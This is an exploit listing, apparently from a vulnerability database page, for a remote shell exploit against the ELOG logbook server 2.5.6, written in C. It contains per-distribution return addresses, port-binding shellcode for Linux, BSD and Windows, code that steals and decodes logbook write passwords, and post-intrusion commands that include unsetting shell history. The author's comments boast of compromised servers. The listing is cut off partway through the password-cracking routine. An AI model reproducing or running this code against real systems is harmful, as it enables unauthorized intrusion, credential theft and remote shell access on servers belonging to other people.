Vulners
Lucene search
ELOG 2.5.6 - Remote Shell
/* Worked on latest version for me
* http://midas.psi.ch/elog/download/tar/elog-latest.tar.gz
* elog-latest.tar.gz 26-Jan-2005 21:36 519K
* Default port 8080.
* str0ke */
/*
Hi there, someone has brought to u a gift.
ELOG Remote Shell Exploit <= 2.5.6 (Also for future Versions)
Updated On 18/April/2004
LOCK YOUR LOGBOOKZ, THERE IS A SPY IN THE WILD!
Bug: Sorry, we do not support fool-disclosure.
Characteristicz : Fully Automated Filling Mechanism ,steal/decode base_64 ELOG _write_ passwordz.
(breakin into write password protected servers,)
Targeting : objdump -t elogd | grep _mtext <----- your magic jumping addres.
change that value with one of the targets below .If The ret lookz like 0x09..
then that means elogd version is 2.5.5 or greater.If 0x8.. then < 2.5.5
NOte: The buffer-length in linux, varies from one distro to other, like the BSD one.
so do not add shit to the target area unless as well as u know what u r doing.
Tricks i : Some hosts using Elog daemon under Apache mod_proxy module,
so u'd better force a bit yourself port scan that host in order to get the elog port.
(Be warned , most of the serverz we owned had at least 2 running elog http servers.)
ii : If U can _not_ get the write pazzword for logbook, then try other logbooks.
(especially, happens when the background mode enabled).
iii : If u happen to meet logbook which has more than 10 attribute/optionz
then add more globalz to the global sectionz of this code,now it supportz
10 att/opt, i haven't seen more than this Yet!.
Challange: Find the other 2 heap and a 1 url traversal bugs in elogd.(Both exploitable)
Finally A big FUCK to the Sn2 for leaking this code to the public.
Unknown u.g Bl4ckh4t group member[3]
nrktx DIGITALLY SIGNATURED
_EOC_
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <ctype.h>
#include <time.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <errno.h>
#include <err.h>
#define _GNU_SOURCE
#define CONTSIZE 10000
#define BOUNSIZE 100
#define REQUESTSIZE 2000
#define INBUF 5000
#define LINEBUFSIZ 1000
#define GETBUFSIZE 10000
#define SENDBUFSIZE 10000
#define TIMEOUT 30
#define ENURLSIZE 200
#define GLOBATTSIZE 200
#define STORESIZE 10000
#define ELOGPORT 8080
#define SHBUFSIZE 288
#define BIGBUFSIZE 5000
#define BACKDOOR 31337
#define BSDBACKDOOR 11520
#define WINBACKDOOR 5555
#define NOP 0x90
#define RED "\033[31m"
#define GREEN "\033[32m"
#define DEFAULT "\033[0m"
#define CHECKELOG "HEAD HTTP/1.1"
#define HTTPVER " HTTP/1.1\r\n"
#define POSTREQ "POST /"
#define GETREQ "GET /"
#define GETREQCMD "?cmd=download"
#define TESTUSER "candy-n4rk0tix"
#define TESTPASS_DECODED "candy-blackhat"
#define ADDICTEDZ "candy:narkotix"
#define EXPERIMENT "iloveucandy"
#define LOGBOOKAUTHOR "CodeName : Candy-bl4ckh47"
#define LOGSUBJECT "Mission Impossible"
#define ATT_FILE "do-NOT-trust-me-biatch"
#define MSGCONTENT "Building Required HTML CONTENT"
#define MSGQUERY "Building Required HTML QUERY"
#define MSGVER "Asking For Version..."
#define MSGBOUNDARY "Building Random BOUNDARY.."
#define MSGSECTOR "Checking IF Sector Is CLEAR.."
#define READOPTION "Getting Required Attr Options BE PATIENT !"
#define PASSALERT "LogBook Is Write Password Protected"
#define GETINGPASS "Wait Bro We R Gonna Catch The Password"
#define PASSSUCCESS "WE GOT The Write Password Bro !!"
#define CLEARAREA "[SECTOR CLEAR.. FORCING OUR LUCK TO GET IN]"
#define NODATA "EOF"
#define PASSFAILED "Could not get password, Prolly Elogd started with -D arg !"
#define DEMOLOGBOOK "demo"
#define UPLOADME 1
#define NOTUPLOADME 0
#define VERSION_CHECKER "Server: ELOG HTTP "
#define AUTHORIZED_DENY "401 Authorization Required"
#define SECTOR_CLEAR "302 Found"
#define INVALIDURL "Invalid URL"
#define ATTERR "Error: Attribute "
#define ATTOPTERR "Error: Attribute option "
#define ATTERRTAG "<b>"
#define ATTERRTAGLAST "</b>"
#define ATTNOTFOUND(x) {fprintf(stderr,"[!] Attribute %s Notfound\n",x);}
#define MAKINGATT(x) {fprintf(stderr,""GREEN"[+]"DEFAULT" Attribute %s ADDING..\
\t"GREEN"DONE"DEFAULT"\n",x);}
#define NOTELOG "Remote Server Is NOT Elog !"
#define REMDOWN "Connection reset by Peer"
#define REMCRASHED "Server DEAD"
#define BIGOPTIONLIST "Too Many Attributes Dude,MODIFY THE CODE !"
#define ASKEDPASS "Please enter password to obtain write access"
#define ALLOCGLOB(x) {x = (char *)malloc(GLOBATTSIZE *sizeof(char));}
#define ZEROGLOB(x) { memset(x,'\0',GLOBATTSIZE);}
#define PRINTINFO(x,y) {if(y <= 1) printf(""GREEN"[+]"DEFAULT" %s\n",x);}
#define NPRINTINFO(x) {printf("[-] %s\n",x);}
#define LOGBOOKNOTFOUND(x,y) {bzero(x,sizeof(x));\
sprintf(x,"Error: logbook \"%s\" not defined",y);\
}
#define BADSELECT "option value=\"\">"
#define COMMAND "echo '---[WE NEVER BELIEVE IN LUCK]---'; uptime ; uname -a ; id;"\
"TERM=xterm; export TERM; who ; unset HISTFILE\n"
#define WINCMD "echo '----WE PWNED U DUDE---' & hostname\n "
char *map = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
char content[CONTSIZE];
static int content_length;
static unsigned char boundary[BOUNSIZE];
char encoded_url[ENURLSIZE];
static int globcount = 0;
static int debug = 1;
static int recount = 0;
int id = 0;
char wpassbufdec[50] = {'\0'};
char wpassbufenc[50] = {'\0'};
char userandpass[50] = ADDICTEDZ;
char encuserandpass[50] = ADDICTEDZ;
char bigbuffer[BIGBUFSIZE];
char shbuffer [288];
char fedorabuf [288];
char debianbuffer [264];
char windozebuf [246];
char windozetext [600];
static unsigned char glob1_att[GLOBATTSIZE] = {'\0'};
static unsigned char glob2_att[GLOBATTSIZE] = {'\0'};
static unsigned char glob3_att[GLOBATTSIZE] = {'\0'};
static unsigned char glob4_att[GLOBATTSIZE] = {'\0'};
static unsigned char glob5_att[GLOBATTSIZE] = {'\0'};
static unsigned char glob6_att[GLOBATTSIZE] = {'\0'};
static unsigned char glob7_att[GLOBATTSIZE] = {'\0'};
static unsigned char glob8_att[GLOBATTSIZE] = {'\0'};
static unsigned char glob9_att[GLOBATTSIZE] = {'\0'};
static unsigned char glob10_att[GLOBATTSIZE] = {'\0'};
static unsigned char glob1_opt[GLOBATTSIZE] = "Other";
static unsigned char glob2_opt[GLOBATTSIZE] = "Other";
static unsigned char glob3_opt[GLOBATTSIZE] = "Other";
static unsigned char glob4_opt[GLOBATTSIZE] = "Other";
static unsigned char glob5_opt[GLOBATTSIZE] = "Other";
static unsigned char glob6_opt[GLOBATTSIZE] = "Other";
static unsigned char glob7_opt[GLOBATTSIZE] = "Other";
static unsigned char glob8_opt[GLOBATTSIZE] = "Other";
static unsigned char glob9_opt[GLOBATTSIZE] = "Other";
static unsigned char glob10_opt[GLOBATTSIZE] = "Other";
struct globalz
{
char *addr;
int id;
};
struct target
{
char *distro;
long ret;
int id;
};
struct target TARGETZ[] =
{
{"Slackware 9.1" , 0x08629588 , 0},
{"Gentoo 3.3.5-r1 " , 0x09093f40 , 1}, /* 0x08624572 for Gentoo 3.3.2 */
{"FreeBSD 4.9 STABLE " , 0x0906aa24 , 2},
{"Mandrake 10.1" , 0x085dd70a , 3},
{"Fedora Core 1" , 0x08624600 , 4}, /* Fedora sux, Inferno Rulez*/
{"Debian 3.0 " , 0x085e0420 , 5}, /* 2.5.6-1 - 0x090853e0 /str0ke */
{"WinXP SP2 Elog-2.5.6", 0x0055D9F0 , 6}, /* Fuck that NULL byte, it is innocent */
{"Redhat 7.3 " , 0x85dd3c0 , 7},
{"Redhat E.L " , 0x090653a0 , 8},
{"Slackware 10 " , 0x09064c80 , 9},
{"FreeBSD 5.2 " , 0x090673c0 , 10},
{"FreeBSD 5.3 STABLE" , 0x090658e0 , 11},
{"NULL " , 0x0 , -1},
};
struct globalz MISSED[]=
{
{(char *)&glob1_att, 0},
{(char *)&glob2_att, 0},
{(char *)&glob3_att, 0},
{(char *)&glob4_att, 0},
{(char *)&glob5_att, 0},
{(char *)&glob6_att, 0},
{(char *)&glob7_att, 0},
{(char *)&glob8_att, 0},
{(char *)&glob9_att, 0},
{(char *)&glob10_att, 0},
{ NULL , 0},
};
struct globalz TRASH[]=
{
{(char *)&glob1_opt, 0},
{(char *)&glob2_opt, 0},
{(char *)&glob3_opt, 0},
{(char *)&glob4_opt, 0},
{(char *)&glob5_opt, 0},
{(char *)&glob6_opt, 0},
{(char *)&glob7_opt, 0},
{(char *)&glob8_opt, 0},
{(char *)&glob9_opt, 0},
{(char *)&glob10_opt, 0},
{NULL , 0}
};
/*linux portbind 31337*/
char lnx_shellcode[] =
"\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1"
"\xb0\x66\xcd\x80\x31\xd2\x52\x66\x68\x7a\x69"
"\x43\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1"
"\xb0\x66\xcd\x80\x40\x89\x44\x24\x04\x43\x43"
"\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43\xb0"
"\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41"
"\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1"
"\xb0\x0b\xcd\x80\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90";
/*BSD portbind */
char bsd_shellcode[] =
"\x31\xc0\x99\x52\x42\x52\x42\x52\x50\xb0\x61"
"\xcd\x80\x6a\x2d\x66\x52\x89\xe3\x6a\x10\x53"
"\x50\x50\xb0\x68\xcd\x80\x5b\x50\x53\x50\xb0"
"\x6a\xcd\x80\xb0\x1e\xcd\x80\x52\x50\x52\xb0"
"\x5a\xcd\x80\x4a\x79\xf6\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x50\x54\x53\x53"
"\xb0\x3b\xcd\x80\x90\x90\x90\x90\x90\x90\x90";
/*Win2k portbind 5555*/
char win_shellcode[] =
"\x66\x81\xec\x04\x07"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31"
"\xc9\x81\xe9\xa6\xff\xff\xff\x81\x36\x76\xac\x7c\x25\x81\xee\xfc"
"\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff\x9e\x94\x7c\x25"
"\x76\xef\x31\x61\x76\x4b\x05\xe3\x0f\x49\x35\xa3\x3f\x08\xd1\x0b"
"\x9f\x08\x66\x55\xb1\x75\x75\xd0\xdb\x67\x91\xd9\x4d\x22\x32\x2b"
"\x9a\xd2\xa4\xc7\x05\x01\xa5\x20\xb8\xde\x82\x96\x60\xfb\x2f\x17"
"\x29\x9f\x4e\x0b\x32\xe0\x30\x25\x77\xf7\x28\xac\x93\x25\x21\x25"
"\x1c\x9c\x25\x41\xfd\xad\xf7\x65\x7a\x27\x0c\x39\xdb\x27\x24\x2d"
"\x9d\xa0\xf1\x72\x5a\xfd\x2e\xda\xa6\x25\xbf\x7c\x9d\xbc\x16\x2d"
"\x28\xad\x92\x4f\x7c\xf5\xf7\x58\x76\x2c\x85\x23\x02\x48\x2d\x76"
"\x89\x98\xf3\xcd\xe6\xac\x7c\x25\x2f\x25\x78\xab\x94\x47\x4d\xda"
"\x10\x2d\x90\xb5\x77\xf8\x14\x24\x77\xac\x7c\xda\x23\x8c\x2b\x72"
"\x21\xfb\x3b\x72\x31\xfb\x83\x70\x6a\x25\xbf\x14\x89\xfb\x2b\x4d"
"\x74\xac\x69\x96\xff\x4a\x16\x35\x20\xff\x83\x70\x6e\xfb\x2f\xda"
"\x23\xb8\x2b\x73\x25\x53\x29\x35\xff\x6e\x1a\xa4\x9a\xf8\x7c\xa8"
"\x4a\x88\x4d\xe5\x1c\xb9\x25\xd6\xdd\x25\xab\xe3\x32\x88\x6c\x61"
"\x88\xe8\x58\x18\xff\xd0\x58\x6d\xff\xd0\x58\x69\xff\xd0\x58\x75"
"\xfb\xe8\x58\x35\x22\xfc\x2d\x74\x27\xed\x2d\x6c\x27\xfd\x83\x50"
"\x76\xfd\x83\x70\x46\x25\x9d\x4d\x89\x53\x83\xda\x89\x9d\x83\x70"
"\x5a\xfb\x83\x70\x7a\x53\x29\x0d\x25\xf9\x2a\x72\xfd\xc0\x58\x3d"
"\xfd\xe9\x40\xae\x22\xa9\x04\x24\x9c\x27\x36\x3d\xfd\xf6\x5c\x24"
"\x9d\x4f\x4e\x6c\xfd\x98\xf7\x24\x98\x9d\x83\xd9\x47\x6c\xd0\x1d"
"\x96\xd8\x7b\xe4\xb9\xa1\x7d\xe2\x9d\x5e\x47\x59\x52\xb8\x09\xc4"
"\xfd\xf6\x58\x24\x9d\xca\xf7\x29\x3d\x27\x26\x39\x77\x47\xf7\x21"
"\xfd\xad\x94\xce\x74\x9d\xbc\xac\x9c\xf3\x22\x78\x2d\x6e\x74\x25";
char *make_http_content(int , char*);
char *make_random_boundary (void);
char *make_request_header(char *,char *,int);
char *urlencode (char *);
void base64_encode (char *, char *);
void get_server_version(char *, unsigned short int);
void base64_decode (char *, char *);
void get_missing_attributes (char *, char *,char *);
void alloc_all_globalz (void);
void re_check_sector (char *,unsigned short,char *,int);
void spy_attr_options (char *,unsigned short int, char *);
void make_spy_header(char *,short, char *,char *);
void crack_the_code (char *,unsigned short, char *);
void authorize_user(char * , char *);
void build_att_buffer (int , int);
void do_last_stage ( char * ,short , char *);
void we_r_coming (char* );
void shell(int sock);
void banner(void);
void usage(char *);
void listos(void);
long get_host_ip (char *);
int cind (char c);
int is_there_attribute (void);
int check_for_clear_sector (char *,unsigned short int,char *,int);
int main (int argc , char *argv[])
{
int flg;
int port = ELOGPORT;
int uniz = 0;
char *logbook = DEMOLOGBOOK;
char *hostname = NULL;
char *u_name = TESTUSER;
char *u_pwd = TESTPASS_DECODED;
char *write_pazzword = NULL;
banner();
while((flg = getopt(argc,argv,"h:p:l:o:w:u:r:dD")) !=EOF)
{
switch(flg)
{
case 'h':
hostname = strdup(optarg);
break;
case 'p':
port = atoi(optarg);
break;
case 'l':
logbook = strdup(optarg);
break;
case 'o':
id = atoi(optarg);
if((id == 2) || (id == 10) || (id == 11)){
uniz++;
break;}
if(id == 6)
uniz = 2;
break;
case 'd':
listos();
exit(1);
case 'u':
u_name = strdup(optarg);
break;
case 'r':
u_pwd = strdup(optarg);
break;
case 'w':
write_pazzword = strdup(optarg);
strncpy(wpassbufdec,write_pazzword,49);
break;
default :
usage(argv[0]);
}
}
if(!hostname)
exit(1);
printf(""GREEN"[+]"DEFAULT" Exploiting on %s : 0x%lx\n",TARGETZ[id].distro,TARGETZ[id].ret);
alloc_all_globalz();
build_att_buffer(uniz,id);
authorize_user(u_name , u_pwd);
get_server_version(hostname,port);
check_for_clear_sector(hostname,port,logbook,0);
return(0);
}
void base64_encode(char *s, char *d)
{
unsigned int t, pad;
pad = 3 - strlen(s) % 3;
if (pad == 3)
pad = 0;
while (*s) {
t = (*s++) << 16;
if (*s)
t |= (*s++) << 8;
if (*s)
t |= (*s++) << 0;
*(d + 3) = map[t & 63];
t >>= 6;
*(d + 2) = map[t & 63];
t >>= 6;
*(d + 1) = map[t & 63];
t >>= 6;
*(d + 0) = map[t & 63];
d += 4;
}
*d = 0;
while (pad--)
*(--d) = '=';
}
void base64_decode(char *s, char *d)
{
unsigned int t;
while (*s) {
t = cind(*s) << 18;
s++;
t |= cind(*s) << 12;
s++;
t |= cind(*s) << 6;
s++;
t |= cind(*s) << 0;
s++;
*(d + 2) = (char) (t & 0xFF);
t >>= 8;
*(d + 1) = (char) (t & 0xFF);
t >>= 8;
*d = (char) (t & 0xFF);
d += 3;
}
*d = 0;
}
int cind(char c)
{
int i;
if (c == '=')
return 0;
for (i = 0; i < 64; i++)
if (map[i] == c)
return i;
return -1;
}
void get_server_version(char *hostname,unsigned short port)
{
const unsigned char *version_chec = VERSION_CHECKER;
const unsigned char *version_request = CHECKELOG;
int yes = 1;
int get_total = 0;
int send_total = 0;
char info_buf[INBUF];
int sock_req;
int ready;
struct sockaddr_in rem_addr;
fd_set read_fd;
struct timeval w_t;
w_t.tv_sec = TIMEOUT;
w_t.tv_usec = 0;
PRINTINFO(MSGVER,1);
sock_req = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(sock_req < 0) {
perror("socket");
exit(EXIT_FAILURE);
}
if(setsockopt(sock_req,SOL_SOCKET,SO_REUSEADDR,&yes,sizeof(int)) == -1)
{ perror("setsockopt");
exit(1);
}
memset(&(rem_addr.sin_zero),'\0',8);
rem_addr.sin_family = AF_INET;
rem_addr.sin_port = htons(port);
rem_addr.sin_addr.s_addr = get_host_ip(hostname);
if( connect(sock_req,(struct sockaddr *)&rem_addr,sizeof(struct sockaddr)) == -1)
{
err(1,NULL);
exit(1);
}
FD_ZERO(&read_fd);
FD_SET(sock_req,&read_fd);
if ((send_total = send(sock_req,version_request,strlen(version_request),0)) == -1)
{
perror("send");
exit(1);
}
if((ready = select(sock_req+1,&read_fd,(fd_set *)NULL,(fd_set *)NULL,&w_t)) < 0){
perror("select");
exit(1);
}
if(FD_ISSET(sock_req,&read_fd))
{
if( (get_total = recv(sock_req,info_buf,sizeof(info_buf)-1,0)) == -1)
{
perror("recv");
exit(1);
}
else if(get_total <= 0){
fprintf(stderr,"[-]Can not receive information\n");
exit(1);
}
info_buf[get_total] = '\0';
int i;
char linebuf[LINEBUFSIZ];
char lastbuf[LINEBUFSIZ];
bzero(linebuf,sizeof(linebuf));
bzero(lastbuf,sizeof(lastbuf));
char *p = (char *)&linebuf[0];
char *k = (char *)&lastbuf[0];
char *z;
if((z = strstr(info_buf,version_chec)) != NULL)
{
strncpy(p,z,500);
for(i = 0; (*p != '-') && (*p != '\n'); i++){
*k++ = *p++;
}
PRINTINFO(lastbuf,debug);
close(sock_req);
return;
}
}
NPRINTINFO(NOTELOG);
close(sock_req);
exit(1);
}
char *make_random_boundary(void)
{
PRINTINFO(MSGBOUNDARY,debug);
char bound_buf[BOUNSIZE];
char *p;
p = bound_buf;
srand((unsigned) time(NULL));
bzero(bound_buf,sizeof(bound_buf));
sprintf(bound_buf,"---------------------------%04X%04X%04X",rand(),rand(),rand());
return(p);
}
char *make_http_content(int choice,char *logbookname)
{
char *pazzword = TESTPASS_DECODED;
char passencode[50];
char *text = NULL;
const char *experiment = logbookname;
const char *att_file = shbuffer;
const char *testuser = TESTUSER;
const char *subject = LOGSUBJECT;
char *l_content = content;
int include_evilfile = 0;
int attrcount = 0;
int j;
if(choice == UPLOADME)
include_evilfile = 1;
else if (choice == NOTUPLOADME)
include_evilfile = 0;
if(id == 4)
att_file = fedorabuf;
if((id == 5) || (id == 2))
att_file = debianbuffer;
if(id == 6){
att_file = windozebuf;
text = windozetext;
}
if(id != 6)
text = bigbuffer;
sprintf(boundary,"%s",make_random_boundary());
PRINTINFO(MSGCONTENT,debug);
base64_encode(pazzword,passencode);
strcpy(content,boundary);
strcat(content, "\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nSubmit\r\n");
sprintf(content + strlen(content),
"%s\r\nContent-Disposition: form-data; name=\"wpwd\"\r\n\r\n%s\r\n",boundary,wpassbufenc);
sprintf(content + strlen(content),
"%s\r\nContent-Disposition: form-data; name=\"unm\"\r\n\r\n%s\r\n",boundary,testuser);
sprintf(content + strlen(content),
"%s\r\nContent-Disposition: form-data; name=\"upwd\"\r\n\r\n%s\r\n", boundary, passencode);
sprintf(content + strlen(content),
"%s\r\nContent-Disposition: form-data; name=\"exp\"\r\n\r\n%s\r\n", boundary, experiment);
if((attrcount = is_there_attribute())) {
for( j = 0; j < attrcount ; j++) {
sprintf(content + strlen(content),
"%s\r\nContent-Disposition: form-data; name=\"%s\"\r\n\r\n%s\r\n",
boundary,MISSED[j].addr,TRASH[j].addr);
}
}
sprintf(content + strlen(content),
"%s\r\nContent-Disposition: form-data; name=\"Subject\"\r\n\r\n%s\r\n", boundary, subject);
sprintf(content + strlen(content),
"%s\r\nContent-Disposition: form-data; name=\"Text\"\r\n\r\n%s\r\n", boundary, text);
if(include_evilfile){
sprintf(content + strlen(content),
"%s\r\nContent-Disposition: form-data; name=\"attfile\";filename=\"%s\"\r\n", boundary, att_file);
}
sprintf(content + strlen(content),"%s\r\n", boundary);
content_length = strlen(content);
content[content_length] = '\0';
return(l_content);
}
char *urlencode(char *str)
{
char *p;
char *s = encoded_url;
p = str;
char *encoded = encoded_url;
bzero(encoded_url,sizeof(encoded_url));
if(index(str,' ') == NULL) {
return(str);
}
while(*p && (int) s < (int) encoded_url + 50 ) {
*s = *p;
if(*p == ' '){
*s = '+';
}
s++;
p++;
}
return(encoded);
}
char *make_request_header(char *logbookname,char *glob_boundary,int which)
{
glob_boundary = boundary;
char request[REQUESTSIZE];
char *p = request;
char boun_buf[BOUNSIZE];
char host_name[50];
char *url_enc = urlencode(logbookname);
if(gethostname(host_name,sizeof(host_name)) == -1)
{ perror("gethostname");
exit(EXIT_FAILURE);
}
sprintf(boun_buf,"%s",boundary);
if(which){
PRINTINFO(MSGQUERY,debug);
}
strncpy(request,POSTREQ,sizeof(POSTREQ));
sprintf(request + strlen(request), "%s/",url_enc);
strcat(request,HTTPVER);
sprintf(request + strlen(request), "Content-Type: multipart/form-data; boundary=%s\r\n",glob_boundary);
sprintf(request + strlen(request), "Host: %s\r\n", host_name);
sprintf(request + strlen(request), "User-Agent: ELOG\r\n");
sprintf(request + strlen(request), "Authorization: Basic %s\r\n",encuserandpass);
sprintf(request + strlen(request), "Content-Length: %d\r\n\r\n", content_length);
bzero(encoded_url,sizeof(encoded_url));
return(p);
}
long get_host_ip(char *hname)
{
long ip_add;
struct hostent *h;
if((ip_add = inet_addr(hname)) < 0)
{
h = gethostbyname(hname);
if(h == NULL)
{
fprintf(stderr,"[-]Can not resolve IP address\n");
exit(1);
}
memcpy(&ip_add,h->h_addr,h->h_length);
}
return(ip_add);
}
int check_for_clear_sector(char *hostname,unsigned short port,char *logbook,int flag)
{
struct sockaddr_in rem_addr;
char sendbuf[SENDBUFSIZE];
char *sendbufp;
char getbuf[GETBUFSIZE];
char *reqbuf;
char notfound[100];
int yes;
int total;
int sock;
int flagchoice;
struct timeval w_t;
fd_set read_fd;
int total_fd;
PRINTINFO(MSGSECTOR,debug);
LOGBOOKNOTFOUND(notfound,logbook);
HEAD:
bzero(&w_t,sizeof(w_t));
w_t.tv_sec = TIMEOUT;
w_t.tv_usec = 0;
if(flag == 0)
flagchoice = NOTUPLOADME;
else
flagchoice = UPLOADME;
sock = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(sock < 0)
{
perror("socket");
exit(1);
}
if(setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,(char *)&yes,sizeof(int)))
{ perror("setsockopt");
close(sock);
exit(1);
}
memset(&(rem_addr.sin_zero),'\0',8);
rem_addr.sin_family = AF_INET;
rem_addr.sin_port = htons(port);
rem_addr.sin_addr.s_addr = get_host_ip(hostname);
if(connect(sock,(const struct sockaddr*)&rem_addr,sizeof(rem_addr)))
{
fprintf(stderr,"[-] Can not Connect to server!\n");
exit(1);
}
sendbufp = make_http_content(flagchoice,logbook);
reqbuf = make_request_header(logbook,boundary,0);
strcpy(sendbuf,reqbuf);
strcat(sendbuf,sendbufp);
if( (send(sock,sendbuf,sizeof(sendbuf),0)) < 0 )
{
perror("send");
exit(-1);
close(sock);
}
FD_ZERO(&read_fd);
FD_SET(sock,&read_fd);
if( (total_fd = select(sock + 1,&read_fd,(fd_set *)NULL,(fd_set *)NULL,&w_t)) < 0)
{
perror("select");
close(sock);
exit(-1);
}
if(FD_ISSET(sock,&read_fd))
{
if( (total = recv(sock,getbuf,sizeof(getbuf),0)) < 1) {
if(errno == EWOULDBLOCK ){
NPRINTINFO(REMDOWN);
PRINTINFO(REMCRASHED,1);
close(sock);
exit(-1);
}
close(sock);
exit(1);
}
if(strstr(getbuf,INVALIDURL)) {
fprintf(stderr,"[-] Invalid URL Bitch, Type the Correct Path\n");
close(sock);
exit(-1);
}
if(strstr(getbuf,AUTHORIZED_DENY)) {
fprintf(stderr,"[-] Type User name and Password for login Bitch\n");
close(sock);
exit(-1);
}
if(strstr(getbuf,notfound)) {
fprintf(stderr,"[-] NO %s LOGBOOK DEFINED BITCH\n",logbook);
close(sock);
exit(-1);
}
if(strstr(getbuf,ASKEDPASS)) {
NPRINTINFO(PASSALERT);
crack_the_code(hostname,port,logbook);
close(sock);
bzero(getbuf,sizeof(getbuf));
goto HEAD;
}
if(strstr(getbuf,ATTOPTERR)) {
PRINTINFO(READOPTION,1);
close(sock);
bzero(getbuf,sizeof(getbuf));
spy_attr_options(hostname,port,logbook);
goto HEAD;
}
if(strstr(getbuf,ATTERR)) {
get_missing_attributes(getbuf,ATTERR,MISSED[globcount].addr);
ATTNOTFOUND(MISSED[globcount].addr);
MAKINGATT (MISSED[globcount].addr);
globcount++;
bzero(getbuf,sizeof(getbuf));
re_check_sector(hostname,port,logbook,flag);
}
if(strstr(getbuf,SECTOR_CLEAR)) {
PRINTINFO(CLEARAREA,1);
close(sock);
do_last_stage(hostname,port,logbook);
we_r_coming(hostname);
}
}
return(1);
}
void get_missing_attributes(char *attbuf, char *errmessage,char *glob_att)
{
int i,j = 0;
char *p,*k;
p = attbuf;
k = glob_att;
bzero(glob_att,sizeof(glob_att));
if(strstr(p,errmessage)){
i = strlen(p) - strlen(strstr(p,ATTERRTAG));
if( *(char *)(p+i) == '<' && *(char *)(p+i+2) == '>' ) {
j = i+3;
for( ; *(char *)(p+j) != '<' && *(char *)(p+j+3) != '>' ; j++ ) {
*k++ = *(char *)(p+j);
}
*k = '\0';
return;
}
}
return;
}
void alloc_all_globalz(void)
{
ZEROGLOB(glob1_att);
ZEROGLOB(glob2_att);
ZEROGLOB(glob3_att);
ZEROGLOB(glob4_att);
ZEROGLOB(glob5_att);
ZEROGLOB(glob6_att);
ZEROGLOB(glob7_att);
ZEROGLOB(glob8_att);
ZEROGLOB(glob9_att);
ZEROGLOB(glob10_att);
}
int is_there_attribute(void)
{
int i = 0;
int j = 0;
for(i = 0; i<10 ; i++) {
if(strlen(MISSED[i].addr))
j++;
}
return(j);
}
void re_check_sector(char *hostname,unsigned short port,char *logbook,int flag)
{
debug++;
if(recount++ >= 10 ){
NPRINTINFO(BIGOPTIONLIST);
exit(1);
}
check_for_clear_sector(hostname,port,logbook,flag);
}
void spy_attr_options(char *hostname,unsigned short port,char *logbook)
{
int soc;
int ready;
int yes = 0;
char request[REQUESTSIZE];
fd_set read_fd;
struct timeval w_t;
struct sockaddr_in rem_addr;
int k,i = 0;
int n = 0;
char response[6900];
char temp[100];
char *p,*z;
bzero(response,sizeof(response));
bzero(temp,sizeof(temp));
make_spy_header(hostname,port,request,logbook);
w_t.tv_sec = TIMEOUT;
w_t.tv_usec = 0;
soc = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(soc < 0){
perror("socket");
exit(1);
}
if(setsockopt(soc,SOL_SOCKET,SO_REUSEADDR,(char *)&yes,sizeof(int)))
{ perror("setsockopt");
close(soc);
exit(1);
}
memset(&(rem_addr.sin_zero),'\0',8);
rem_addr.sin_family = AF_INET;
rem_addr.sin_port = htons(port);
rem_addr.sin_addr.s_addr = get_host_ip(hostname);
if(connect(soc,(const struct sockaddr*)&rem_addr,sizeof(rem_addr)))
{
fprintf(stderr,"[-] Can not Connect to server!\n");
exit(1);
}
if( (send(soc,request,strlen(request),0)) < 0 )
{
perror("send");
exit(-1);
close(soc);
}
FD_CLR(soc,&read_fd);
FD_ZERO(&read_fd);
FD_SET(soc,&read_fd);
if( (ready = select(soc+1,&read_fd,(fd_set *)NULL,(fd_set *)NULL,&w_t)) < 0)
{
perror("select read socket");
close(soc);
exit(1);
}
if(FD_ISSET(soc,&read_fd)){
i = recv(soc, response, 100, 0);
if (i < 0) {
perror("Cannot receive response");
exit(1);
}
n = i;
while (i > 0) {
i = recv(soc, response + n, 100, MSG_DONTWAIT);
if (i > 0)
n += i;
if(i <= 0)
break;
}
response[strlen(response)] = '\0';
close(soc);
fflush(stdin);
#define findme(x,y) {sprintf(x,"Options %s =%c",y,0x20);}
for(i = 0 ; MISSED[i].addr != NULL ; i++) {
findme(temp,MISSED[i].addr);
if((p = strstr(response,temp)) != NULL) {
z = TRASH[i].addr;
while( (!iscntrl(*p+1) || isalnum(*p+1))){
*z = *(char *)(p + strlen(temp));
z++;
p++;
}
for(k = 0; TRASH[i].addr[k] ; k++) {
if((TRASH[i].addr[k] == ',') || (TRASH[i].addr[k] == '\n')) {
TRASH[i].addr[k] = '\0';
}
}
bzero(temp,sizeof(temp));
}
}
}
return;
}
void crack_the_code(char *hostname,unsigned short port,char *logbook)
{
int soc;
int ready;
int yes = 0;
char request[REQUESTSIZE];
fd_set read_fd;
struct timeval w_t;
struct sockaddr_in rem_addr;
int i = 0;
int n = 0;
char response[6900];
char wpassbuf[100];
char *z;
char *p = wpassbuf;
char *w = wpassbufenc;
bzero(wpassbuf,sizeof(wpassbuf));
bzero(wpassbufdec,sizeof(wpassbufdec));
make_spy_header(hostname,port,request,logbook);
w_t.tv_sec = TIMEOUT;
w_t.tv_usec = 0;
soc = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(soc < 0)
{
perror("socket");
exit(1);
}
if(setsockopt(soc,SOL_SOCKET,SO_REUSEADDR,(char *)&yes,sizeof(int))) {
